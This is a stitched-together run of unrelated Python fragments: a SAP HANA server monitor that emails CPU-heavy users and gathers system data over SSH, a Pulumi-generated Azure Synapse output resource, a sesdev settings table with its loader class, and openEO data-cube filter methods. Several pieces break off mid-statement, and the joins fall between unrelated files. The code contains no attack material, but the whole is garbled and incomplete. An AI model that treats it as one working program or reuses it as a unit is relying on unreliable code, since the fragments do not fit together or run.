cpu_threshold = Mc.get_db_cpu_usage_warn_threshold(self._monitor.get_db_operator(), self.__logger)
Mu.log_debug(self.__logger,
"Server:{0}, cpu usage:{1}, threshold:{2}".format(server_name, cpu_usage, cpu_threshold),
location_id)
if cpu_usage is not None and cpu_usage > cpu_threshold:
# sending warning email to top 5 CPU consumers
top5_cpu_consumers = self._monitor.get_db_operator().get_top5_cpu_consumers(server_id)
Mu.log_debug(self.__logger,
"Server ({0}), top 5 cpu consumers:{1}".format(server_name, top5_cpu_consumers),
location_id)
# If it's not working time, skip following part (Sending email)
if not Mu.is_current_time_working_time():
Mu.log_info(self.__logger, "Skip sending email because of the non-working time.")
return
email_to = [consumer["EMAIL"] for consumer in top5_cpu_consumers if consumer["EMAIL"] is not None]
Mu.log_debug(self.__logger, "[CPU] Sending email to:{0}".format(email_to), location_id)
Mu.send_email(Mc.get_db_email_sender(self._monitor.get_db_operator(), self.__logger),
email_to,
"[MONITOR.CPU] {0} is Running Out of CPU Resource".format(server_name),
Mu.generate_email_body(server_info, Mc.SERVER_INFO_CPU, top5_cpu_consumers),
self._monitor.get_db_operator().get_email_admin(location_id))
class HANAServerOSOperatorService:
""" Server OS side operator, responsible for all shell command operations, it's designed as singleton.
To get the instance of this class: HANAServerOSOperatorService.instance()
Initialize the class using HANAServerOSOperatorService() will raise an exception.
"""
__instance = None
@staticmethod
def instance():
"""static access method for singleton"""
if HANAServerOSOperatorService.__instance is None:
HANAServerOSOperatorService()
return HANAServerOSOperatorService.__instance
def __init__(self):
if HANAServerOSOperatorService.__instance is not None:
raise MonitorOSOpError("This class is a singleton, use HANAServerOSOperatorService.instance() instead")
else:
HANAServerOSOperatorService.__instance = self
self.__suse_dao = SUSEMonitorDAO()
self.__redhat_dao = RedHatMonitorDAO()
self.__server_info = {}
# base64.b64decode(Mc.SSH_DEFAULT_PASSWORD).decode("utf-8")
self.__os_passwd = Mu.get_decrypt_string(Mc.get_rsa_key_file(), Mc.get_ssh_default_password())
self.__os_user = Mc.get_ssh_default_user()
self.__logger = Mu.get_logger(Mc.LOGGER_MONITOR_SERVER_OS_OPERATOR)
def __get_dao(self, server_os=None):
if server_os is None or len(server_os) == 0:
Mu.log_debug(self.__logger, "The relative server does not have 'OS' information, using default value.")
server_os = Mc.get_ssh_default_os_type()
# raise MonitorOSOpError("The relative server does not have 'OS' information, failed at '__get_dao'")
return self.__suse_dao if "SUSE" in server_os.upper() else self.__redhat_dao
def open_ssh_connection(self, server_name, user_name=None, user_password=None):
if user_name is None or user_password is None:
user_name, user_password = self.__os_user, self.__os_passwd
Mu.log_debug(self.__logger, "Trying to connect {0}.".format(server_name))
ssh = self.__get_dao().open_ssh_connection(server_name, user_name, user_password)
if ssh is not None:
Mu.log_debug(self.__logger, "Connected {0}.".format(server_name))
return ssh
def close_ssh_connection(self, ssh):
self.__get_dao().close_ssh_connection(ssh)
def __init_server_info_dict(self, server_id):
self.__server_info[server_id] = {Mc.FIELD_DISK_TOTAL: None,
Mc.FIELD_DISK_FREE: None,
Mc.FIELD_MEM_TOTAL: None,
Mc.FIELD_MEM_FREE: None,
Mc.FIELD_CPU_NUMBER: None,
Mc.FIELD_CPU_UTILIZATION: None,
Mc.FIELD_OS: None}
def __set_server_info(self, server_id, info_type, *args):
if len(args) < 2:
Mu.log_error(self.__logger, "Error in __set_server_info, number of arguments < 2")
return
if server_id not in self.__server_info:
self.__init_server_info_dict(server_id)
if info_type == Mc.SERVER_INFO_MEM:
self.__server_info[server_id][Mc.FIELD_MEM_TOTAL] = args[0]
self.__server_info[server_id][Mc.FIELD_MEM_FREE] = args[1]
elif info_type == Mc.SERVER_INFO_CPU:
self.__server_info[server_id][Mc.FIELD_CPU_NUMBER] = args[0]
self.__server_info[server_id][Mc.FIELD_CPU_UTILIZATION] = args[1]
elif info_type == Mc.SERVER_INFO_DISK:
self.__server_info[server_id][Mc.FIELD_DISK_TOTAL] = args[0]
self.__server_info[server_id][Mc.FIELD_DISK_FREE] = args[1]
elif info_type == Mc.SERVER_INFO_OS:
self.__server_info[server_id][Mc.FIELD_OS] = args[0]
self.__server_info[server_id][Mc.FIELD_KERNEL] = args[1]
def reset_server_info(self, server_id):
"""reset the __server_info to empty value"""
if server_id in self.__server_info:
self.__init_server_info_dict(server_id)
def collect_disk_info(self, ssh, server_id, mount_point, os):
"""collect disk info, including total size and unused size"""
if Mc.use_simulator_4_disk():
# use simulator is USE_SIMULATOR is True
total_size, unused_size = OSSimulator.simulate_collect_disk_info()
else:
os_output = self.__get_dao(os).collect_disk_info(ssh, mount_point)
if os_output is None:
Mu.log_warning(self.__logger, "Can not get disk info for server:{0}, "
"mount_point:{1}.".format(server_id, mount_point))
total_size = -1
unused_size = -1
else:
try:
results = os_output[0].split()
total_size = float(results[0])
unused_size = float(results[1])
except Exception as ex:
total_size = -1
unused_size = -1
Mu.log_warning(self.__logger, "Parsing SSH output failed in 'collect_disk_info' with error: {0}, "
"server: {1}, the output: {2}".format(ex, server_id, os_output))
self.__set_server_info(server_id, Mc.SERVER_INFO_DISK, total_size, unused_size)
def collect_mem_info(self, ssh, server_id, os):
""" get the overall memory information for system"""
if Mc.use_simulator_4_mem():
# use simulator if USE_SIMULATOR is True
mem_total, mem_free = OSSimulator.simulate_collect_mem_info()
else:
os_output = self.__get_dao(os).collect_mem_info(ssh)
if os_output is None:
Mu.log_warning(self.__logger, "Can not get memory info for server:{0}.".format(server_id))
mem_total = -1
mem_free = -1
else:
try:
results = os_output[0].split()
mem_total = int(results[0])
mem_free = int(results[1])
except Exception as ex:
mem_total = -1
mem_free = -1
Mu.log_warning(self.__logger, "Parsing SSH output failed in 'collect_mem_info' with error: {0}, "
"server: {1}, the output: {2}".format(ex, server_id, os_output))
self.__set_server_info(server_id, Mc.SERVER_INFO_MEM, mem_total, mem_free)
def collect_cpu_info(self, ssh, server_id, os):
""" get the overall CPU information for system"""
if Mc.use_simulator_4_cpu():
# use simulator if USE_SIMULATOR is True
cpu_number, cpu_usage = OSSimulator.simulate_collect_cpu_info()
else:
os_output_cpu_number, os_output_cpu_usage = self.__get_dao(os).collect_cpu_info(ssh)
# get cpu number
if os_output_cpu_number is None:
Mu.log_warning(self.__logger, "Can not get cpu number info for server:{0}.".format(server_id))
cpu_number = -1
else:
try:
cpu_number = int(os_output_cpu_number[0])
except Exception as ex:
cpu_number = -1
Mu.log_warning(self.__logger, "Parsing SSH output failed in 'collect_cpu_info(0)' "
"with error: {0}, server: {1}, "
"the output: {2}".format(ex, server_id, os_output_cpu_number))
# get cpu usage
if os_output_cpu_usage is None:
Mu.log_warning(self.__logger, "Can not get cpu usage info for server:{0}.".format(server_id))
cpu_usage = -1
else:
try:
cpu_usage = float(os_output_cpu_usage[0])
except Exception as ex:
cpu_usage = -1
Mu.log_warning(self.__logger, "Parsing SSH output failed in 'collect_cpu_info(1)' "
"with error: {0}, server: {1}, "
"the output: {2}".format(ex, server_id, os_output_cpu_usage))
self.__set_server_info(server_id, Mc.SERVER_INFO_CPU, cpu_number, cpu_usage)
def collect_os_info(self, ssh, server_id, os):
"""get os info, including os version and kernel version"""
os_output_os_version, os_output_os_kernel = self.__get_dao(os).collect_os_info(ssh)
# get os version
if os_output_os_version is None:
Mu.log_warning(self.__logger, "Can not OS release info for server:{0}, ".format(server_id))
os_version = ''
else:
try:
os_version = str(os_output_os_version[0]) \
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['OutputSynapseArgs', 'OutputSynapse']
@pulumi.input_type
class OutputSynapseArgs:
def __init__(__self__, *,
database: pulumi.Input[str],
password: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
server: pulumi.Input[str],
stream_analytics_job_name: pulumi.Input[str],
table: pulumi.Input[str],
user: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a OutputSynapse resource.
:param pulumi.Input[str] database: The name of the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The password that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Job exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The name of the SQL server containing the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
:param pulumi.Input[str] table: The name of the table in the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] user: The user name that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Stream Output. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "stream_analytics_job_name", stream_analytics_job_name)
pulumi.set(__self__, "table", table)
pulumi.set(__self__, "user", user)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def database(self) -> pulumi.Input[str]:
"""
The name of the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: pulumi.Input[str]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Stream Analytics Job exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The name of the SQL server containing the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter(name="streamAnalyticsJobName")
def stream_analytics_job_name(self) -> pulumi.Input[str]:
"""
The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "stream_analytics_job_name")
@stream_analytics_job_name.setter
def stream_analytics_job_name(self, value: pulumi.Input[str]):
pulumi.set(self, "stream_analytics_job_name", value)
@property
@pulumi.getter
def table(self) -> pulumi.Input[str]:
"""
The name of the table in the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "table")
@table.setter
def table(self, value: pulumi.Input[str]):
pulumi.set(self, "table", value)
@property
@pulumi.getter
def user(self) -> pulumi.Input[str]:
"""
The user name that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: pulumi.Input[str]):
pulumi.set(self, "user", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Stream Output. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _OutputSynapseState:
def __init__(__self__, *,
database: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server: Optional[pulumi.Input[str]] = None,
stream_analytics_job_name: Optional[pulumi.Input[str]] = None,
table: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering OutputSynapse resources.
:param pulumi.Input[str] database: The name of the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Stream Output. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The password that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Job exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The name of the SQL server containing the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
:param pulumi.Input[str] table: The name of the table in the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] user: The user name that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
if database is not None:
pulumi.set(__self__, "database", database)
if name is not None:
pulumi.set(__self__, "name", name)
if password is not None:
pulumi.set(__self__, "password", password)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if server is not None:
pulumi.set(__self__, "server", server)
if stream_analytics_job_name is not None:
pulumi.set(__self__, "stream_analytics_job_name", stream_analytics_job_name)
if table is not None:
pulumi.set(__self__, "table", table)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Stream Output. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The password that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Stream Analytics Job exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def server(self) -> Optional[pulumi.Input[str]]:
"""
The name of the SQL server containing the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server", value)
@property
@pulumi.getter(name="streamAnalyticsJobName")
def stream_analytics_job_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "stream_analytics_job_name")
@stream_analytics_job_name.setter
def stream_analytics_job_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "stream_analytics_job_name", value)
@property
@pulumi.getter
def table(self) -> Optional[pulumi.Input[str]]:
"""
The name of the table in the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "table")
@table.setter
def table(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "table", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
The user name that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
class OutputSynapse(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server: Optional[pulumi.Input[str]] = None,
stream_analytics_job_name: Optional[pulumi.Input[str]] = None,
table: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Stream Analytics Output to an Azure Synapse Analytics Workspace.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.get_resource_group(name="example-resources")
example_job = azure.streamanalytics.get_job(name="example-job",
resource_group_name=azurerm_resource_group["example"]["name"])
example_account = azure.storage.Account("exampleAccount",
resource_group_name=azurerm_resource_group["example"]["name"],
location=azurerm_resource_group["example"]["location"],
account_tier="Standard",
account_replication_type="LRS",
account_kind="StorageV2",
is_hns_enabled=True)
example_data_lake_gen2_filesystem = azure.storage.DataLakeGen2Filesystem("exampleDataLakeGen2Filesystem", storage_account_id=example_account.id)
example_workspace = azure.synapse.Workspace("exampleWorkspace",
resource_group_name=azurerm_resource_group["example"]["name"],
location=azurerm_resource_group["example"]["location"],
storage_data_lake_gen2_filesystem_id=example_data_lake_gen2_filesystem.id,
sql_administrator_login="sqladminuser",
sql_administrator_login_password="<PASSWORD>!")
example_output_synapse = azure.streamanalytics.OutputSynapse("exampleOutputSynapse",
stream_analytics_job_name=azurerm_stream_analytics_job["example"]["name"],
resource_group_name=azurerm_stream_analytics_job["example"]["resource_group_name"],
server=azurerm_synapse_workspace["test"]["connectivity_endpoints"]["sqlOnDemand"],
| |
import json
import os
import yaml
from .constant import Constant
from .exceptions import \
SettingNotKnown, \
SettingTypeError
from .log import Log
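# Note (added for clarity): every entry in SETTINGS below follows the same schema --
# a dict with 'type' (the expected Python type), 'help' (a description) and 'default'.
# Reading a default value is then a plain dict lookup (illustrative only):
#   SETTINGS['ram']['default']  # -> 4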
SETTINGS = {
# RESERVED KEY, DO NOT USE: 'strict'
'apparmor': {
'type': bool,
'help': 'Enable/disable AppArmor',
'default': True,
},
'caasp_deploy_ses': {
'type': bool,
'help': 'Deploy SES using rook in CaasP',
'default': False,
},
'ceph_salt_git_repo': {
'type': str,
'help': 'If set, it will install ceph-salt from this git repo',
'default': '',
},
'ceph_salt_git_branch': {
'type': str,
'help': 'ceph-salt git branch to use',
'default': '',
},
'cluster_network': {
'type': str,
'help': 'The network address prefix for the cluster network',
'default': '',
},
'container_registry': {
'type': dict,
'help': 'Container registry data [prefix, location, insecure]',
'default': None,
},
'cpus': {
'type': int,
'help': 'Number of virtual CPUs in each node',
'default': 2,
},
'custom_repos': {
'type': list,
'help': 'Optional custom zypper repos to apply to all nodes',
'default': [],
},
'deepsea_git_repo': {
'type': str,
'help': 'If set, it will install DeepSea from this git repo',
'default': '',
},
'deepsea_git_branch': {
'type': str,
'help': 'Git branch to use',
'default': 'master',
},
'deployment_tool': {
'type': str,
'help': 'Deployment tool (deepsea, cephadm) to deploy the Ceph cluster',
'default': '',
},
'devel_repo': {
'type': bool,
'help': 'Include "devel" zypper repo, if applicable',
'default': True,
},
'developer_tools_repos': {
'type': dict,
'help': 'Developer Tools Module repos for various versions of SLE',
'default': Constant.DEVELOPER_TOOLS_REPOS,
},
'disk_size': {
'type': int,
'help': 'Storage disk size in gigabytes',
'default': 8,
},
'domain': {
'type': str,
'help': 'The domain name for nodes',
'default': '{}.test',
},
'dry_run': {
'type': bool,
'help': 'Dry run (do not deploy any VMs)',
'default': False,
},
'encrypted_osds': {
'type': bool,
'help': 'Whether OSDs should be deployed encrypted',
'default': False,
},
'explicit_cpus': {
'type': bool,
'help': 'Whether --cpus was given on the command line',
'default': False,
},
'explicit_num_disks': {
'type': bool,
'help': 'Whether --num-disks was given on the command line',
'default': False,
},
'explicit_ram': {
'type': bool,
'help': 'Whether --ram was given on the command line',
'default': False,
},
'fqdn': {
'type': bool,
'help': 'Whether \'hostname\' command returns FQDN or short hostname',
'default': False,
},
'filestore_osds': {
'type': bool,
'help': 'Whether OSDs should be deployed with FileStore instead of BlueStore',
'default': False,
},
'image_path': {
'type': str,
'help': 'Container image path for Ceph daemons',
'default': '',
},
'image_paths_devel': {
'type': dict,
'help': 'paths to devel container images',
'default': Constant.IMAGE_PATHS_DEVEL,
},
'image_paths_product': {
'type': dict,
'help': 'paths to product container images',
'default': Constant.IMAGE_PATHS_PRODUCT,
},
'internal_media_repos': {
'type': dict,
'help': 'Internal Media repos for various versions of SES',
'default': Constant.INTERNAL_MEDIA_REPOS,
},
'ipv6': {
'type': bool,
'help': 'Configure IPv6 addresses. This option requires "Accept Router '
'Advertisements" to be set to 2. You can change it by running '
'"sysctl -w net.ipv6.conf.<if>.accept_ra=2" where '
'<if> is the network interface used by libvirt for network '
'forwarding, or "all" to apply to all interfaces.',
'default': False
},
'libvirt_host': {
'type': str,
'help': 'Hostname/IP address of the libvirt host',
'default': '',
},
'libvirt_networks': {
'type': str,
'help': 'Existing libvirt networks to use (single or comma separated list)',
'default': '',
},
'libvirt_private_key_file': {
'type': str,
'help': 'Path to SSH private key file to use when connecting to the libvirt host',
'default': '',
},
'libvirt_storage_pool': {
'type': str,
'help': 'The libvirt storage pool to use for creating VMs',
'default': '',
},
'libvirt_use_ssh': {
'type': bool,
'help': 'Flag to control the use of SSH when connecting to the libvirt host',
'default': None,
},
'libvirt_user': {
'type': str,
'help': 'Username to use to login into the libvirt host',
'default': '',
},
'makecheck_ceph_branch': {
'type': str,
'help': 'Branch to check out for purposes of running "make check"',
'default': '',
},
'makecheck_ceph_repo': {
'type': str,
'help': 'Repo from which to clone Ceph source code',
'default': '',
},
'makecheck_stop_before_git_clone': {
'type': bool,
'help': 'Stop before cloning the git repo (make check)',
'default': False,
},
'makecheck_stop_before_install_deps': {
'type': bool,
'help': 'Stop before running install-deps.sh (make check)',
'default': False,
},
'makecheck_stop_before_run_make_check': {
'type': bool,
'help': 'Stop before running run-make-check.sh (make check)',
'default': False,
},
'makecheck_username': {
'type': str,
'help': 'Name of ordinary user that will run make check',
'default': 'sesdev',
},
'non_interactive': {
'type': bool,
'help': 'Whether to run without prompting the user',
'default': False,
},
'num_disks': {
'type': int,
'help': 'Number of additional disks in storage nodes',
'default': 2,
},
'os': {
'type': str,
'help': 'OS version (leap-15.1, tumbleweed, sles-12-sp3, or sles-15-sp1)',
'default': '',
},
'os_makecheck_repos': {
'type': dict,
'help': 'repos to add to VMs in "makecheck" environments',
'default': Constant.OS_MAKECHECK_REPOS,
},
'os_box': {
'type': dict,
'help': 'vagrant box to be used for a given operating system (os)',
'default': Constant.OS_BOX_MAPPING,
},
'os_ca_repo': {
'type': dict,
'help': 'ca repo to add on all VMs of a given operating system (os)',
'default': Constant.OS_CA_REPO,
},
'os_repos': {
'type': dict,
'help': 'repos to add on all VMs of a given operating system (os)',
'default': Constant.OS_REPOS,
},
'provision': {
'type': bool,
'help': 'Whether to provision the VMs (e.g., deploy Ceph on them) after they are created',
'default': True,
},
'public_network': {
'type': str,
'help': 'The network address prefix for the public network',
'default': '',
},
'qa_test': {
'type': bool,
'help': 'Automatically run integration tests on the deployed cluster',
'default': False,
},
'ram': {
'type': int,
'help': 'RAM size in gigabytes for each node',
'default': 4,
},
'repo_priority': {
'type': bool,
'help': 'One or more zypper repos will have elevated priority',
'default': True,
},
'repos': {
'type': list,
'help': 'DEPRECATED: use custom_repos instead',
'default': [],
},
'rgw_ssl': {
'type': bool,
'help': 'Whether to deploy RGW with SSL enabled',
'default': False,
},
'roles': {
'type': list,
'help': 'Roles to apply to the current deployment',
'default': [],
},
'scc_password': {
'type': str,
'help': 'SCC organization password',
'default': '',
},
'scc_username': {
'type': str,
'help': 'SCC organization username',
'default': '',
},
'single_node': {
'type': bool,
'help': 'Whether --single-node was given on the command line',
'default': False,
},
'ssd': {
'type': bool,
'help': 'Makes one of the additional disks be non-rotational',
'default': False,
},
'stop_before_ceph_orch_apply': {
'type': bool,
'help': 'Stops deployment before ceph orch apply',
'default': False,
},
'stop_before_ceph_salt_apply': {
'type': bool,
'help': 'Stops deployment before ceph-salt apply',
'default': False,
},
'stop_before_cephadm_bootstrap': {
'type': bool,
'help': 'Stops deployment before cephadm bootstrap',
'default': False,
},
'stop_before_ceph_salt_config': {
'type': bool,
'help': 'Stops deployment before ceph-salt config',
'default': False,
},
'stop_before_stage': {
'type': int,
'help': 'Stop deployment before running the specified DeepSea stage',
'default': None,
},
'synced_folder': {
'type': list,
'help': 'Sync Folders to VM',
'default': [],
},
'use_salt': {
'type': bool,
'help': 'Use "salt" (or "salt-run") to apply Salt Formula (or execute DeepSea Stages)',
'default': False,
},
'version': {
'type': str,
'help': 'Deployment version to install ("nautilus", "ses6", "caasp4", etc.)',
'default': 'nautilus',
},
'version_default_roles': {
'type': dict,
'help': 'Default roles for each node - one set of default roles per deployment version',
'default': Constant.ROLES_DEFAULT_BY_VERSION,
},
'version_devel_repos': {
'type': dict,
'help': 'the "devel repo", whatever that means on a particular VERSION:OS combination',
'default': Constant.VERSION_DEVEL_REPOS,
},
'version_os_repo_mapping': {
'type': dict,
'help': 'DEPRECATED: additional repos to be added on particular VERSION:OS combinations',
'default': Constant.VERSION_DEVEL_REPOS,
},
'vm_engine': {
'type': str,
'help': 'VM engine to use for VM deployment. Current options [libvirt]',
'default': 'libvirt',
},
'msgr2_secure_mode': {
'type': bool,
'help': 'Set "ms_*_mode" options to "secure"',
'default': False,
},
'msgr2_prefer_secure': {
'type': bool,
'help': 'Prioritise secure mode over "crc" in the ms_*_mode options.',
'default': False,
},
}
class Settings():
# pylint: disable=no-member
def __init__(self, strict=True, **kwargs):
self.strict = strict
config = self._load_config_file()
self._apply_settings(config)
self._apply_settings(kwargs)
for k, v in SETTINGS.items():
if k not in kwargs and k not in config:
Log.debug("Setting {} to default value ->{}<-"
.format(k, v['default']))
setattr(self, k, v['default'])
def override(self, setting, new_value):
if setting not in SETTINGS:
raise SettingNotKnown(setting)
Log.debug("Overriding setting '{}', old value: {}"
.format(setting, getattr(self, setting)))
Log.debug("Overriding setting '{}', new value: {}"
.format(setting, new_value))
setattr(self, setting, new_value)
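# Hedged usage sketch (not part of the original module): Settings pulls values from
# constructor kwargs, the config file loaded by _load_config_file(), and the SETTINGS
# defaults above, in that order of precedence, while override() rejects unknown names.
# Values below are illustrative only.
#
#   settings = Settings(ram=8, single_node=True)   # kwargs win over config/defaults
#   settings.override('num_disks', 4)              # raises SettingNotKnown for typos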
def _apply_settings(self, settings_dict):
for k, v in settings_dict.items():
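# The remainder of _apply_settings() is cut off in this dump.  A minimal sketch of
# the likely body -- an assumption based on the SettingNotKnown / SettingTypeError
# imports and the 'strict' flag, not the verbatim implementation:
#
#   if k not in SETTINGS:
#       if self.strict:
#           raise SettingNotKnown(k)
#       Log.warning("Ignoring unknown setting '{}'".format(k))
#       continue
#   if v is not None and not isinstance(v, SETTINGS[k]['type']):
#       raise SettingTypeError(k, SETTINGS[k]['type'], v)
#   setattr(self, k, v)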
consisting of two elements. The first
element is the minimum wavelength and the second element is the maximum wavelength. Wavelengths are
specified in micrometers (μm). The order of the specified array defines the order of the bands in the
data cube. If multiple bands match the wavelengths, all matched bands are included in the original
order.
:return: A data cube limited to a subset of its original bands. The dimensions and dimension properties
(name, type, labels, reference system and resolution) remain unchanged, except that the dimension of
type `bands` has less (or the same) dimension labels.
"""
return filter_bands(data=self, bands=bands, wavelengths=wavelengths)
def filter_bbox(self, extent) -> 'ProcessBuilder':
"""
Spatial filter using a bounding box
:param self: A data cube.
:param extent: A bounding box, which may include a vertical axis (see `base` and `height`).
:return: A data cube restricted to the bounding box. The dimensions and dimension properties (name,
type, labels, reference system and resolution) remain unchanged, except that the spatial dimensions
have less (or the same) dimension labels.
"""
return filter_bbox(data=self, extent=extent)
def filter_labels(self, condition, dimension, context=UNSET) -> 'ProcessBuilder':
"""
Filter dimension labels based on a condition
:param self: A data cube.
:param condition: A condition that is evaluated against each dimension label in the specified
dimension. A dimension label and the corresponding data is preserved for the given dimension, if the
condition returns `true`.
:param dimension: The name of the dimension to filter on. Fails with a `DimensionNotAvailable`
exception if the specified dimension does not exist.
:param context: Additional data to be passed to the condition.
:return: A data cube with the same dimensions. The dimension properties (name, type, labels, reference
system and resolution) remain unchanged, except that the given dimension has less (or the same)
dimension labels.
"""
return filter_labels(data=self, condition=condition, dimension=dimension, context=context)
def filter_spatial(self, geometries) -> 'ProcessBuilder':
"""
Spatial filter using geometries
:param self: A data cube.
:param geometries: One or more geometries used for filtering, specified as GeoJSON.
:return: A data cube restricted to the specified geometries. The dimensions and dimension properties
(name, type, labels, reference system and resolution) remain unchanged, except that the spatial
dimensions have less (or the same) dimension labels.
"""
return filter_spatial(data=self, geometries=geometries)
def filter_temporal(self, extent, dimension=UNSET) -> 'ProcessBuilder':
"""
Temporal filter for a temporal interval
:param self: A data cube.
:param extent: Left-closed temporal interval, i.e. an array with exactly two elements: 1. The first
element is the start of the temporal interval. The specified instance in time is **included** in the
interval. 2. The second element is the end of the temporal interval. The specified instance in time is
**excluded** from the interval. The specified temporal strings follow [RFC 3339](https://www.rfc-
editor.org/rfc/rfc3339.html). Also supports open intervals by setting one of the boundaries to `null`,
but never both.
:param dimension: The name of the temporal dimension to filter on. If no specific dimension is
specified or it is set to `null`, the filter applies to all temporal dimensions. Fails with a
`DimensionNotAvailable` exception if the specified dimension does not exist.
:return: A data cube restricted to the specified temporal extent. The dimensions and dimension
properties (name, type, labels, reference system and resolution) remain unchanged, except that the
temporal dimensions (determined by the `dimension` parameter) may have less dimension labels.
"""
return filter_temporal(data=self, extent=extent, dimension=dimension)
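# Hedged usage sketch (not from the source): these fluent helpers are normally
# chained on a ProcessBuilder instance; parameter values below are illustrative.
#
#   cube = cube.filter_temporal(extent=["2021-01-01", "2022-01-01"]) \
#              .filter_bands(bands=["B04", "B08"]) \
#              .filter_bbox(extent={"west": 5.0, "south": 51.0, "east": 6.0, "north": 52.0})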
def first(self, ignore_nodata=UNSET) -> 'ProcessBuilder':
"""
First element
:param self: An array with elements of any data type.
:param ignore_nodata: Indicates whether no-data values are ignored or not. Ignores them by default.
Setting this flag to `false` considers no-data values so that `null` is returned if the first value is
such a value.
:return: The first element of the input array.
"""
return first(data=self, ignore_nodata=ignore_nodata)
